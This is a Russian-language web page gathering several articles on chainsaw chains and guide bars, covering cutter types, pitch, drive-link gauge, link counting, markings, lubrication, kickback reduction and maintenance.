19 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Размеры пильных цепей и шин

Как правильно выбрать цепь для бензопилы

Цепь бензопилы выполняет важную функцию при работе. Именно от неё в большей степени зависит производительность и скорость реза.

Правильно подобрав пильную гарнитуру для бензопилы с малой мощностью, можно значительно увеличить характеристики её работы. В этой статье рассмотрим виды цепей и их основные параметры.

Из чего состоит

Современная пильная цепь сделана из звеньев трех типов:

Рабочие зубья делятся на левосторонние и правосторонние. Ведущие, их еще называют хвостовиками, устанавливаются между соединительными и рабочими с определенным шагом, который зависит от размеров звеньев. Соединительные, как понятно из названия, объединяют рабочие и ведущие звенья.

Два основных вида, которые сейчас можно встретить в продаже: чипперные и чиззельные цепи. Разделение основано на индивидуальных параметрах и форме рабочего зуба.

Чипперные — более универсальные.

Они могут применяться, как обычными пользователями для работы в быту, так и профессионалами для продольного пиления. Наиболее часто профессионалы используют пильные цепи такого вида на бензопилах, работающих в пилорамах типа LOGOSOL. Они, при условии соблюдения необходимого угла заточки (10 0 ), способны быстро пилить вдоль волокон, что в пилораме самое важное, при этом их работоспособность и высокая производительность сохраняется длительное время. При необходимости цепи такого вида, как и остальные, можно затачивать, применяя для этого напильник или заточной станок.

Чиззельные – показывают большую производительность при поперечном резе.

Используются профессионалами при валке и раскряжевке. Углы атаки такой цепи агрессивные, она легко врезается и быстро режет, но только поперек волокон. Скорость реза вдоль, даже при условии правильной заточки, у такой гарнитуры меньше.

Ниже представлено видео о видах цепей и критериях выбора для бензопилы. В нем подробно рассказывается об основных параметра гарнитуры. Показывается, как выглядят звенья разных типов и размеров. Большое внимание уделяется шагу и ширине.

Специальные

Отдельным видом цепей для бензопил являются твердосплавные, специального назначения. К таким относятся цепи для резки бетона, газобетона или аварийно-спасательных работ. Конструкция зуба в такой гарнитуре включает в себя победитовую напайку, которая и позволяет пилить бетон, тонкий металл, арматуру, стекло.

Стоят подобные цепи очень дорого. Рядовому пользователю покупать их не целесообразно.

Параметры пильной цепи

Цепи для бензопил принято разделять по следующим параметрам:

  1. Шаг или расстояние между соседними тремя заклепками.
  2. Ширина посадочного звена.
  3. Количество звеньев.
  4. Вид режущих зубьев.

Параметры гарнитуры сочетают в себе различные комбинации, от чего зависят конечные результаты, качество и скорость реза.

Например, гарнитура может иметь такие параметры: шаг 3/8, длину 52 звена, ширину паза 1,3 мм, вид режущего зуба чиппер. Опытный специалист, оценив данные, скажет, что она предназначена для продольного реза и имеет средние показатели производительности и отдачи. Цепи такого типа могут устанавливаться на бензопилы бытового назначения, т.к. они более универсальные.

Давайте разберемся, почему он делает такие выводы.

  1. Шаг цепи 3/8. Такой шаг может применяться на бензопилах средней и низкой мощности. На сегодняшний день это самый популярный вариант шага. Подробнее о шаге цепи и его видах вы можете почитать в статье посвященной этому параметру, перейдя по ссылке.
  2. Второе, это форма зуба. Чиппер – в переводе с английского означает рубить в щепки. Такая форма имеет большую площадь рабочей кромки, за счет чего не режет, а разрубает волокна древесины. Применяются в основном для продольного реза, или поперечного, но на бытовых бензопилах, где скорость и качество особой роли не играет. Чизельные цепи режут лучше и быстрее поперек. Для продольного реза они не используются. Чизель в переводе резец, долото. Кромки такого зуба очень острые и тонкие, сама форма отличается агрессивными углами. Использовать чизельные цепи для продольного или фигурного реза не рекомендуется, к тому же они имеют высокую отдачу, т.к. врезаются в древесину быстрее и эффективнее.
  3. Длина 52 звена, говорит о том, что эта цепь устанавливается на 14-дюймовую шину (35 см). Их ставят на бензопилы бытового назначения.

И последнее, что дает основание отнести гарнитуру к среднему классу производительности, это ширина посадочного паза. В основном встречается три варианта ширины, это: 1,1 мм, 1,3 и 1,5.

Ширина паза прямо пропорциональна ширине пропила и зависит от размеров зуба. Чем ширина паза больше, тем шире рез и наоборот. Цепи с минимальным показателем ширины отличаются низкой отдачей и скоростью реза. В основном, такие устанавливаются на бензиновых высоторезах и цепных пилах малой мощности.

Гарнитура с посадочным 1,3 мм может устанавливаться как на бытовых, так и на полупрофессиональных и профессиональных бензопилах, шаг цепи при этом может быть разный.

Ширина 1,5 мм ранее применялась только на цепях для профессионального использования. В последнее время, в связи с тем, что рынок заполонили мощные и доступные бензопилы китайского производства, такие цепи стали использоваться и на них.

Ширина 1,6 мм и 2 мм. применяется исключительно на профессиональных и промышленных пилах.

Какая лучше

С параметрами разобрались, теперь посмотрим, какая цепь для бензопилы лучше и почему. Вопрос этот актуальный, т.к. всем хочется использовать только самое лучшее, но по каким критериям определить какая цепь лучше, а какая хуже. Лучше, значит быстрее, или лучше – безопаснее?

У всех видов есть как преимущества, так и недостатки. Например, чизельная с размером посадочного 1,5 мм и шагом 0,404 дюйма, самая опасная. У нее высокая отдача, её тяжело контролировать, но в тоже время, она отличается от других лучшими показателями скорости реза и производительности.

Мы думаем, что решать какая цепь для бензопилы лучше, а какая хуже, должен потребитель, основываясь на свой опыт. Мы можем только рассказать о фактах.

Как подобрать

Вопрос подбора актуален для малоопытных пользователей. Профессионалы знают о гарнитуре практически все и умеют выбирать то, что им нужно. По этой причине, наши советы будут ориентированы именно на любителей, а не на профи. Итак, приступим.

Для того чтобы правильно выбрать нужно:

  1. Знать характеристики бензопилы, а именно шаг и длину шины. Опираться на название и модель бензопилы при выборе не стоит, т.к. на одну бензопилу могут устанавливаться шины различной длины и ширины посадочного звена.
  2. Заранее определиться с объемом и видом работ, для которых планируется её использовать. Если пилить поперек, то выбираем чизельные, вдоль – чипперные.

Важно! Затачивать под продольный рез (10 0 ) придется самостоятельно или в сервисном центре. Гарнитура, заточенная для продольного реза, в продаже встречается редко.

Отдельно нужно упомянуть о выборе гарнитуры Штиль. Если вы планируете купить цепь этого производителя (они на сегодняшний день считаются самыми качественными), то для выбора лучше воспользоваться специальной формой поиска, которую можно найти на сайте компании.

Введя в форму поиска данные бензопилы, программа автоматически выберет и предложит вам подходящие варианты. Сервис удобный, но имеет один большой минус, подбор ведется только по моделям бензопил Штиль. Для того чтобы подобрать цепь для пил других брендов, придется вооружиться каталогом.

Тест-драйв цепей

Представляем вашему вниманию интересное видео, автор которого показывает производительность цепей разных брендов: Husqvarna, Stihl, Oregon и другие.

Как посчитать звенья

Многие пользователи не знают, как правильно посчитать количество звеньев цепи, хотя делается это достаточно просто. Считать лучше по хвостовикам. Для того чтобы не сбиться при подсчете, хвостовик с которого начинаете считать, нужно пометить. Сделать это можно маркером или приклеив на него бумажку.

Второй вариант подсчета — считать количество соединительных звеньев. Быстрее считать парно, для этого цепь нужно размотать, сложить пополам и разложить на ровной поверхности, например, на столе.

Важно! При подсчете не критично ошибиться на одно звено в большую сторону. Если недосчитаться одного звена, то при выборе и покупке запасной цепи можно сделать ошибку и приобрести короткую цепь, установить которую на бензопилу будет невозможно.

Как узнать какая гарнитура на бензопиле

Определить тип цепи, которая установлена на бензопиле, можно несколькими способами. Если пила новая, только купленная, то тип и размер цепи указываются в документах (руководстве пользователя, в разделе характеристики). Если пила уже успела поработать и не известно, менялась ли гарнитура за время эксплуатации, то определить тип цепи можно проведя следующие действия:

  1. Снять гарнитуру и посчитать количество звеньев.
  2. При помощи штангенциркуля померить ширину хвостовика.
  3. Визуально определить тип режущего зуба. Острые боковые грани — чизельный, плавные грани — чипперный.
  4. Линейкой или штангенциркулем померить шаг цепи.

Важно! Неправильно снятые размеры могут привести к тому, что новая цепь не установится в шину бензопилы или будет иметь шаг отличный от шага звездочек, поэтому при проведении замеров нужно быть более внимательным.

Еще один вариант определить размеры, который не требует использования измерительного инструмента — это посмотреть маркировку. Ширина хвостовика указывается с наружной стороны зубца ограничителя. Значения ширины на зубце показано без единицы, т.е. если на зубце стоит цифра 3, то ширина хвостовика 1,3 мм, остальные размеры аналогично.

Некоторые производители, например, Орегон, на хвостовик своей продукции наносят номер модели. Зная номер, можно без труда определить характеристики цепи, найдя информацию о модели в каталоге.

Заключение

Мы рассмотрели виды и особенности гарнитуры для бензопилы, рассказали, как можно посчитать количество звеньев и определить, какая цепь установлена. Если у вас остались вопросы или вы желаете что-то уточнить, пишите в комментарии, мы обязательно ответим.

Подбор цепи и шины для бензопилы. А так же советы по использованию.

Подбор цепи и шины для бензопилы трудная задача для многих, поэтому я решил рассказать в этой статье про это подробно. В конце несколько советов по использованию.

Подбор цепи

Самый простой вариант это, если у Вас на шине не стерлась информация о подходящей вам цепи. Тогда все просто по этим параметрам и покупайте цепь. Второй вариант, если осталась упаковка (пакет или коробка) от цепи. Из маркировки на упаковке можно выяснить количество звеньев цепи. Третий вариант тоже не сложный, но необходимо знать по каким параметрам нужно подбирать цепь.

Необходимые параметры цепи:

  • количество звеньев
  • шаг цепи
  • толщина зуба ведущего звена

Как посчитать звенья

Длина цепи измеряется не в сантиметрах, а по количеству звеньев. Что бы быстрее и удобнее можно было посчитать звенья, цепь нужно сложить и выровнять звенья друг напротив друга. Далее считаем парами, потом умножаем на 2. Если в конце осталось одно звено без пары, то после умножения, это звено прибавляем к общему количеству. Например, 28•2+1=57.

Шаг цепи

Шаг цепи — это расстояние между заклепками, измеряется в дюймах. Основные размеры, которые можно сейчас встретить на пилах ¼″, 3/8″, 0.325″, 0.375″, 0.404″. Они применяются в зависимости от класса бензопилы. Самые распространенные шаги 3/8″ и 0.325″. Применяются на бытовых и полупрофессиональных пилах.

Толщина зуба ведущего звена

Толщину зуба ведущего звена все производители указывают последнее время в мм. Используются следующие: 1,1 мм, 1,3 мм, 1,5 мм, 1,6 мм. Применяются в зависимости от класса бензопилы и длинны шины. Самый распространенный 1,3 мм. Если толщина паза шины будет шире, чем толщина звена, то во время пиления бензопилу будет уводить.

Подбирать толщину звена, используя шину, нельзя. Особенно, если шина уже использовалась. В использованной шине паз изношен и никак не может быть эталонным. Лучше измерить звено микрометром или штангенциркулем.

Узнав все три эти параметра, вы можете купить правильную цепь для своей бензопилы.

Подбор шины

Шина подбирается по нескольким параметрам:

  • длинна
  • тип хвостовика
  • толщина паза (если, цепь уже есть)
  • шаг цепи
  • расположение смазочного отверстия

Длину шины нужно выбирать исходя из рекомендаций производителя, если такой информации у вас нет, подбирать такую же, которая использовалась.

виды хвостовиков шин

Тип хвостовика очень важен, так как шина с другим либо не подойдет, либо принесет только вред. Основное деление типов хвостовиков шины: закрытый и открытый. Далее подбираем в точности по форме.

Толщина паза подбирается по толщине ведущего звена. Например, если толщина звена 1,3 мм, то паз по ширине должен быть 1,3 мм.

Шаг цепи важен для того, что бы шаг звездочки совпал с шагом цепи.

Если на вашей шине есть отверстие для смазки цепи, оно должно быть точно на том же месте. Если оно не совпадает или вообще отсутствует, то смазка не будет поступать на шину и цепь. Это приводит к перегреву и быстрому износу цепи и шины или полностью придут в негодность.

Несколько советов

Когда вы определились со всеми параметрами и собрались в магазин, обязательно возьмите с собой цепь и шину. Это поможет продавцу для правильного подбора или вам для сравнения и уверенности в выборе.

Цепь всегда выбирайте с закаленным зубом. Так же будет хорошо, если на режущем зубе цепи есть метка, до которой можно затачивать зуб. Еще по этой метке можно определить угол заточки цепи.

После завершения работы, ослабляйте немного цепь, до небольшого провисания. Не секрет, что при пилении цепь нагревается и растягивается, после этого мы ее натягиваем на шину. Что бы цепь не остывала в натянутом состоянии, ослабьте натяжение. Это продлит срок службы цепи.

Переворачивайте шину на другую сторону перед каждым пилением. Равномерный износ шины также продлит срок службы пилы.

В запасе лучше иметь одну или две цепи. Нужно это для того, что бы после каждого пиления менять их поочередно, опять же для увеличения ресурса.

Если у Вас не осталось ни шины ни пилы, обратитесь на специальные сервисы производителей цепей в интернете. Эти сервисы помогают правильно подобрать цепь и шину по моделям для бензопил всех известных брендов.

Теперь Вы знаете все параметры, что бы правильно выбрать цепь и шину для бензопилы. Удачной работы!

Если остались какие-то вопросы, пишите их в коментарии

Маркировка цепей для бензопил

В некоторых ситуациях у обладателей бензопил может возникать некая путаница в понимании всех обозначений маркировки цепей для этих инструментов. По итогу это приводить к неудачным покупкам. Выбор бензопил зачастую определяется всего лишь несколькими основными критериями, одним из которых является шаг цепи. Данный показатель помогает выделить будущие возможности инструмента, в том числе его скорость распила, а также по нормам должен соответствовать уровню мощности двигателя. Как же маркируются цепи? Давайте разберёмся!

Шаг и его размеры

Шаг – это промежуточное расстояние между тремя заклёпками, которые располагаются рядом. Для правильного вычисления шага цепи следует произвести замер расстояния между осями трёх заклёпок, размещённых вблизи друг друга. В виде формулы это выглядит следующим образом:

L=S/2

Где, L – это величины длины шага, которая в бензопилах характеризует степень удалённости двух зубьев по отношению друг к другу;

S – значение промежутка между двумя крайними заклёпками из трёх.

Величина шага может быть также равна длине расстояния между двумя соседними хвостовиками.

Закономерность: чем больше будет расстояние между режущими зубцами, тем глубже они будут входить в распиливаемый материал

Путём увеличения размера шага цепи становится возможным повышение производительности бензопилы. Однако, в подобном случае изменяется степень прилагаемого усилия для осуществления вращения приводной звёздочки. И чем выше шаг цепи, тем большей должна быть мощность двигателей и больше физических сил затрачивается для её протяжки при распиловке материалов.

Шаг цепи бензопилы. Таблица

С учётом величины шага, на сегодняшний момент цепи разделяются не несколько подтипов:

Как видно из таблицы шаг цепи обозначается как обычное число (3/4) и десятичное – «0,375». Подобное разделение вызвано схожестью десятичных значений – «0,325» и «0,375», поскольку разница в одну цифру создавала путаницу при подборе пилы. Поэтому в своё время было принято решение об установлении двух разных обозначений: десятичными и обычными дробями.

Шаг выштамповывается в области специального ограничителя глубины распила на каждом зубе.

К плюсам цепей с большим шагом можно отнести:

  • высокий уровень производительности за счёт широкого пропила;
  • возможность выполнения сложных работ (валка крупных деревьев).

Но следует учесть, что широкий пропил требует использования более мощного двигателя, что в свою очередь значительно увеличивает сопротивление.

Преимуществами цепей с малым шагом являются:

  • низкий уровень вибрации;
  • плавные движения при пропиле;
  • чистота реза.

Достигаются преимущества за счёт большого количества зубьев и малого расстояния между ними.

Вся известная классификация цепей основывается на особенностях их маркировки в зависимости от шага, который предназначен для определённых потребностей и производится под конкретную мощность электрооборудования. Для лучшего понимания каждого типа шага, их следует рассмотреть по отдельности.

Основные параметры цепей

Нанесение маркировка цепи предполагает наличие следующих параметров:

  1. Шаг:
  • «0,325» – самый распространённый и минимальный размер шага, который используется в полупрофессиональных и бытовых бензопилах с малыми мощностями. Стандартная величина мощности под такой шаг колеблется в пределах от «0,325» до «3л.с.», но не выше «3,5л.с». При работе с таким типом цепи распил проходит более плавно, комфортно, без «порывов» обрабатываемых изделий.
  • «0,375» («3/8») – наносится на бензопилы с мощностью в «4л.с». Такая цепь применяется при распиловке древесины средней и малой толщины.

От значения шага зависит точность и качество создаваемого пропила. В случаях отсутствия важности достижения высокого качества при работе бензопилой иногда особое значение имеет точность реза. Для этого необходимо обязательно учитывать зависимость шага на роспуск древесины по заранее нанесённым разметкам.

  1. Толщина ведущих звеньев (хвостиков). При работе бензопилы на её цепь приходится большая часть всех нагрузок. Учитывая это, ещё одной главной характеристикой работы пилы является толщина элементов звена, которое входит в пазы шины. Этот параметр также определяет общую толщину скрепляющих звеньев, которая измеряется с помощью обычного штангенциркуля. К стандартным значениям толщины относят:

  • «1,1 мм» («0,043») и «1,3 мм» («0,05») – используются при производстве цепей начального уровня, которые предназначены для осуществления незначительных объёмов работ. Зачастую при таких значениях толщины звеньев длина шага цепи может составлять «0,325», что предполагает наличие невысоких нагрузок и щадящего режима работы. Поэтому их используют в бытовых и полупрофессиональных аппаратах;
  • «1,5 мм» («0,058») – самая распространённая величина толщины на рынке бензопил и комплектующим к ним. Такое значение способно обеспечить безопасную работу при величине шага в «3/8». Цепь с толщиной 1,5мм не предназначена для распила профессионального уровня;
  • «1,6 мм» (0,063) и «2,0 мм» (0,08) – предназначаются для проведения самых сложных работ. Металлом при изготовлении таких цепей служит сталь особых марок, а в конструкцию закладываются характеристики повышенной прочности.

Чем большей будет толщина звена и шире паз шины, тем высококачественнее считается бензопила, поскольку она способна выдерживать большие нагрузки.

  1. Глубина реза – является отличительной особенностью производимых цепей и характеризуется высотой профиля режущих зубьев. Измеряется она промежутком между ограничителями и режущей верхней кромкой. На рынке могут быть представлены, как высокопрофильные (0,762 мм), так и низкопрофильные (0,635 мм) виды цепных изделий.


Чем больше высота профиля, тем выше вход в материал (глубина) и скорость распиливания

Высокопрофильные цепи устанавливаются на бензопилы с повышенными мощностями двигателя. Информация о высоте профиля, как правило, прописывается в характеристике к инструменту.

Профиль влияет на возникновение вибраций, вызывающие в последствии изношенность привода либо проблемы при удержании инструмента в руках. При этом чем выше режущие части, тем сильнее будет степень вибрации.

Бытовые типы бензопил оснащаются низким профилем. В полупрофессиональных устройствах могут сочетаться разные варианты типов цепей. Однако в большинстве случаев придерживаются принципа:

В цепи с большим шагом устанавливают низкий профиль, а при шаге «0,325» — высокий

Такими вариациями повышается скорость распила не за счёт шага, а благодаря изменению глубины или высота профиля. Хотя в профессиональных инструментах акцент делают на повышение шага, объясняя это тем, что бензопила становится более управляемой.

  1. Геометрия режущих зубьев – профиль может быть двух основных типов:
  • чипперный (в народе «серп») – имеет серповидную форму и отличается высокой производительностью. При эксплуатации легче затачивается и не требует соблюдения чётких углов заточки. Недостаток: риск возникновения высоких нагрузок и ухудшения режущих характеристик;
  • чизельный (в народе «семёрка») – имеет рабочую поверхность прямой формы в виде цифры «7». Применяются в цепях с шагом «0,404» или «3/8» на профессиональных пилах. Главный недостаток чизельных звеньев – сложность заточки режущих элементов и чувствительность к воздействию грязи.

  1. Количество режущих зубьев – определяется как соотношение числа зубьев к количеству направляющих в шине. В бензопилах хорошего производства должны сочетаться два направляющих звена в режущей части инструмента.
  2. Тип заточки звеньев – напрямую зависит от типа будущих работ. Классические виды бензопил применяются в большинстве своём для поперечного распила деревьев и редко используются для продольного распила. С учётом сопротивления дерева в обоих случаях в цепях может использоваться разный угол размещения звеньев. На строительных прилавках сейчас можно встретить цепи со следующими типами режущих звеньев:
  • продольный тип цепи – предполагает распил дерева вдоль его волокон. Угол реза достигает 5-15 градусов.
  • поперечный тип – распил ведётся поперёк. Угол реза в цепях составляет 25-35 градусов.

  1. Длина цепи – зависит от параметров и технических характеристик самой бензопилы: мощности, габаритов и др. При стандартном или нормированном натяжении цепи её длина чаще всего указывается в паспорте.
  2. Порядок следования звеньев – последовательность расположения звеньев может быть разной:
  • стандартный – на каждое режущее звено в цепи приходится два ведущих звена;
  • с полупропуском – каждое третье по размещению звено в цепи заменено на так называемое соединительное;
  • с пропуском – в местах расположения каждого второго звена для реза устанавливается соединительное.

Зачем нужен пропуск звеньев в цепи? В самих цепях наиболее ценным является качество режущих звеньев, поскольку они изготавливаются по особым технологиям и имеют большую стоимость в отличие от соединительных звеньев. При невозможности укоротить цепь единственным вариантом удешевления стоимости цепи становится пропуск режущих элементов. В работе цепи с пропусками звеньев показывают сниженную производительность и быстро изнашиваются.

В целом, желая приобрести инструмент для распила древесины с максимальной эффективностью, не поленитесь дополнительно изучить маркировку цепей для бензопил, указываемую также в инструкциях к инструменту.

Конструктивные особенности пильных цепей и уход за ними

Первые ручные бензопилы появились в 1920-х. На них устанавливались цепи с прямыми и плоскими зубьями – такая цепная система не отличалась высокой эффективностью и была весьма трудоемкой в обслуживании. В 1947 году Джозеф Кокс предложил новый тип цепи. Ее форма была Г-образной, за счет чего удалось многократно повысить производительность бензопил, и обеспечивала простоту заточки. В результате цепь Кокса достаточно быстро вытеснила с рынка всех своих конкурентов. В настоящее время большинство бензопил снабжаются именно такими цепными системами — они имеют характерный серпообразный режущий профиль и позволяют эффективно работать с любым типом древесины.

Конструкция пильной цепи

Концепция цепи для мотопилы, предложенная Джозефом Коксом оказалось настолько удачной, что не претерпела практически никаких конструктивных изменений. По большому счету усовершенствования коснулись лишь системы смазки инструмента, а также борьбы с обратной отдачей и вибрациями.

Любая пильная цепь состоит из звеньев трех типов:

Это наиболее сложная деталь цепной гарнитуры. Ее конструкция включает ограничитель глубины пропила и режущий элемент с контурным углом резки.

  1. Ведущие

Такие звенья еще называют хвостовиками. Через ведущую звездочку они передают вращение от двигателя пилы на цепь, обеспечивая ее стабильное положение на шине.

Предназначены для соединения режущих и ведущих элементов.

Главными в цепной системе являются режущие звенья. Они бывают лево- и правосторонними, а их режущие грани выступают за плоскость шины, что обеспечивает свободный распил с минимальным сопротивлением резке. Цепные зубья (резцы) работают по принципу рубанка – чем дальше будет выдвинута верхняя режущая кромка, тем крупнее будет распил.

Резцы пильной цепи различаются на два основных типа:

  1. Чизель (англ.chisel – долото, резец)

Обладают высокой производительностью и обеспечивают хорошую скорость пиления. Конфигурация таких резцов обеспечивает меньшую площадь контакта с древесиной при распиле, благодаря чему снижается сопротивление последней. Недостатками цепных зубьев чизельного типа являются высокая чувствительность к абразивной среде, а также сложность и трудоемкость процесса заточки.

  1. Чиппер (англ. сhipper – рубить в щепу)

Серпообразный профиль чипперных резцов менее эффективен из-за увеличенной площади контакта при распиле. С другой стороны чипперы очень удобны в обслуживании, поскольку скругленный угол резца не так болезненно реагирует на погрешности при затачивании.

Цепи с чипперными звеньями предпочтительно использовать при резке загрязненной древесины.

Основные параметры

Пильные цепи принято различать по:

  • направлению распила (продольные и поперечные);
  • габаритам (длине и размеру элементов цепной гарнитуры);
  • конструктивным особенностям;
  • порядку следования режущих звеньев.

Распил древесины вдоль волокон вызывает большее сопротивление, нежели поперек. В виду востребованности обоих видов распиловки производится два вида пильных цепей – продольные и поперечные. Они отличаются углом атаки резцов. В результате при продольном распиле повышается производительность пилы, а при поперечном сглаживается «агрессивность» инструмента. Ну а вместе с последней снижает уровень вибраций и уменьшается нагрузка на двигатель.

При невысоких требованиях к качеству продольный распил можно выполнять мотопилой с поперечной цепью.

Шины бензопил, представленных сегодня на рынке, имеют различные габариты. Одним из главных параметров пильной цепи является количество звеньев, т.е. длина цепи. Кроме того, цепные системы имеют определенный шаг. Он измеряется расстоянием между тремя последовательно соединенными звеньями, деленным на два.

Классификация пильных цепей по шагу

В зависимости от значения шага пильные цепи различаются на 5 классов:

Малый шаг имеют цепи, устанавливаемые на одноручные мотопилы. Такой инструмент не отличается мощностью, однако позволяет выполнять точные работы, т.ч. в труднодоступных местах.

Цепи с такими значениями шага получили наиболее широкое применение. Свыше 80% производимого в мире инструмента снабжаются именно такими цепными гарнитурами.

Крупные цепные гарнитуры устанавливаются на большие пилы с повышенной производительностью – валочные системы, харвестерное оборудование и т.п.

Очевидно, что чем больше размеры звеньев цепи, тем большей производительностью она обладает. При этом следует помнить о том, что и распил будет шире, а значит, для преодоления сопротивления древесины резке понадобится большая пила.

Классификация по толщине хвостовика

Толщина ведущих звеньев является вторым по значимости параметром цепи. Он должен совпадать с размером паза шины, по которому в процессе работы скользит последняя. За счет этого повышается надежность посадки и исключается риск ее соскока в процессе работы. Сам же ход цепи при этом выполняется плавно, без лишних рывков и вибраций.

Мировые производители пильных цепей выпускают гарнитуры 5 основных типоразмеров:

  • 1,1 мм (миниатюрные цепи для мини-пил);
  • 1,3 мм (наиболее востребованы, т.к. устанавливаются на бытовые и полупрофессиональные мотопилы);
  • 1,5 мм (устанавливаются на пилы высокой мощности и производительности);
  • 1,6 и 2 мм (цепи с толстыми хвостовиками устанавливаются на профессиональных и промышленных пилах).

Высота профиля, глубина резки и объем двигателя пилы

В зависимости от высоты режущей кромки, расположенной над плоскостью направляющей шины пильные цепи различаются на высоко- и низкопрофильные. Первые обеспечивают максимальную производительность, тогда как вторые имеют увеличенную площадь опоры режущего звена, вследствие чего дают тонкую стружку и являются более безопасными в работе.

Глубиной резки называют величину зазора между верхней гранью резца и ограничителем пропила, который регулирует толщину стружки. Наиболее востребованы пильные гарнитуры с зазорами 0,025’’ и 0,03’’, тогда как цепи со значением этого параметра до 0,07’’ применяются в составе агрегатов машинной валки леса. Именно глубина резки определяет производительность цепной гарнитуры. Однако, чем большей она будет, тем сильнее пила будет вибрировать при работе. С целью уравновесить показатели производительности и вибраций на цепи с большим шагом производители устанавливают режущие зубья с минимальной глубиной и наоборот.

Объем двигателя пилы имеет самое прямое отношение к выбору пильной цепи. Если последняя будет установлена на слишком мощный инструмент, то будет подвержена повышенным нагрузкам и выйдет из строя гораздо раньше положенного срока. Поэтому при покупке цепной гарнитуры следует внимательно изучить технические характеристики самой пилы.

Порядок следования режущих звеньев

В списке основных параметров пильных цепей также находится порядок следования режущих звеньев. В стандартной конструкции на каждый из резцов приходится по паре хвостовиков. В цепи же с полупропуском каждый третий резец заменен ведущим звеном, а в гарнитурах с полным пропуском – каждый второй. Цепи второго и третьего типа не производятся – они изготавливаются кустарным методом из заводской продукции.

Гарнитуры с пропуском и полупропуском стоят значительно дешевле стандартных, однако уступают им в производительности, надежности и удобстве в работе.

Система смазки пильных цепей

От качества смазки цепи и шины мотопилы напрямую зависит надежность и эффективность последней. С целью обеспечения нормальной работы инструмента производители снабжают его масляным насосом, который подает масло на режущую систему через специальные отверстия. За равномерное распределение масла отвечает сама цепь – ее хвостовики, проходя через звездочку, захватывают смазку, которая в результате движения гарнитуры растекается по ней и шине пилы. Нередко для повышения эффективности смазывания в ведущих звеньях с помощью фрезы или сверла выполняются специальные каналы, а в соединительных – дополнительные углубления.

Система смазки мотопилы работает на снижение разрушающего эффекта трения и, конечно же, нагрева. Это значительно увеличивает срок службы как цепной гарнитуры, так и инструмента в целом. Поэтому пользователь должен контролировать процесс смазывания. Если при разгоне цепи на линии распила отсутствует масляный след, это означает, что пила перегревается, а сама цепь может достаточно быстро затупиться, а то и вовсе лопнуть.

С целью повышения смазывающего эффекта мировые производители выпускают масла для пил на органической основе. Стоят они несколько дороже, однако обеспечивают в четверть меньший расход, а при выделении в окружающую среду саморазлагаются в течение нескольких часов.

На современные бензопилы можно устанавливать цепи и шины с различными параметрами. Однако перед покупкой новой гарнитуры для конкретной модели, следует удостовериться, что ее система смазки справится со своими функциями при работе.

Вибрация и отдача при распиле

Ни первого, ни второго при работе с бензопилой не избежать, однако можно снизить их интенсивность. Вибрация в пильной цепи возникает вследствие столкновения резцов с древесиной. В момент контакта режущей кромки с деревом она на долю секунды оказывается зажатой между ним и шиной. Часть ударной энергии через гарнитуру, ведущую звездочку и корпус пилы передается на руки пользователя.

Для уменьшения эффекта отдачи вследствие вибраций при распиле древесины используются:

  • скошенный ограничитель пропила (обеспечивает мягкое движение цепи за счет плавного соскальзывания древесины с резца);
  • амортизационные выступы на хвостовиках и соединителях (способствуют погашению вибрации при ее передаче на звездочку);
  • скошенная либо завышенная пятка резца (обеспечивает проседание цепи в момент удара, что способствует не только гашению вибрации, но и снижению износа цепной гарнитуры и пильной шины).

Благодаря применению этих конструктивных элементов в цепи существенно уменьшается риск травматизма при отскакивании пилы вследствие контакта носка шины с твердой поверхностью.

Обслуживание пильных цепей: основные моменты

Пильная гарнитура, шина и ведущая звездочка являются расходными материалами. Поэтому наиболее важные вопросы при покупке инструмента и гарнитуры к нему касаются надежности и долговечности. Во многом они зависят от типа и интенсивности работ, которые будет выполнять пользователь. Не менее важную роль играют:

  • смазка гарнитуры;
  • обкатка и натяжка цепи;
  • заточка резцов;
  • уход за инструментом.

Обкатка цепной гарнитуры выполняется путем ее замачивания на некоторое время в масле с последующим кратковременным прогоном на холостых оборотах и регулировкой натяжения. Если цепь будет натянута недостаточно, она будет постоянно соскакивать, тогда как перетяжка приводит к увеличению нагрузки на цепь и ее преждевременному износу.

Вследствие интенсивной работы бензопилой резцы пильной цепи затупляются. Чтобы каждый раз не приходилось покупать новую гарнитуру, пользователь может выполнить заточку режущих элементов самостоятельно. При этом необходимо четко соблюдать соответствие остроты углов резца и высоты ограничителя заводским параметрам. Кроме того, нужно проследить, чтобы все режущие звенья цепи были заточены одинаково. В противном случае снизится производительность инструмента либо усилится вибрация и нагрузка на двигатель пилы.

Еще одним важным моментом при работе с бензопилой является контроль целостности цепи. При возникновении малейших трещин, потертостей или повреждений ее следует заменить. В завершение отметим, что только грамотный подбор, а также своевременный и правильный уход за инструментом и гарнитурой может обеспечить нормальную производительность, долговечность, надежность и, разумеется, безопасность бензопилы.

Сервисное обслуживание бензопилы, видео

Шина для бензопилы: подбираем и устанавливаем правильный вариант

Бытовая, полупрофессиональная и профессиональная ручная бензопильная техника независимо от стоимости и эксплуатационных характеристик имеет идентичную конструкцию. Режущая гарнитура, в состав которой входит шина для бензопилы, и пильная цепь относится к категории сменного оборудования.

Решение, какую шину поставить на бензопилу принимается владельцем с учетом многих факторов. В первую очередь — это совместимость посадочного места и каналов подачи смазки в рабочую зону, мощность двигателя, специфика предстоящей работы.

Конкретную помощь в самостоятельном выборе шины могут оказать рекомендации опытных специалистов или информация инструкции по применению.

В частности, длинная пильная гарнитура предпочтительнее для валки и распиловки деревьев большого диаметра, короткая — для кронирования деревьев и подготовки к монтажу строительной древесины.

Общая конструкция

В стандартном решении, продольная шина для бензопилы представляет собой изготовленную из качественной стали деталь удлиненной овальной конфигурации.

На одном конце расположены отверстия под резьбовый крепеж, на другом конце длинных шин устанавливается ведомая звездочка. Такое устройство шины способствует плавности хода цепи и снижению нагрузок на двигатель.

По периметру шины выполнена проточка, в которую заводятся хвостовики пильной цепи. Через специальные сверления для охлаждения и смазки гарнитуры в рабочую зону в дозированном количестве подается цепное масло.

Размерные характеристики

Направляющий паз шины бензопилы бытовой категории, имеет ширину 1,1 или 1,3 мм. Этот же показатель для профессиональных моделей составляет 1,5-1,6 мм. Несоответствие толщины хвостовика цепи и ширины паза может инициировать перегрев гарнитуры и ее досрочный выход из строя. В другом варианте возможен выход цепи из паза или ее обрыв.

Аналогичные последствия могут быть при несовпадении шага цепи и венца приводного механизма. Во многих моделях бензопил замена ведущей звездочки сопряжена с затратным по времени демонтажем узла сцепления. В ряде случаев требуется оборудование сервисно-ремонтного уровня.

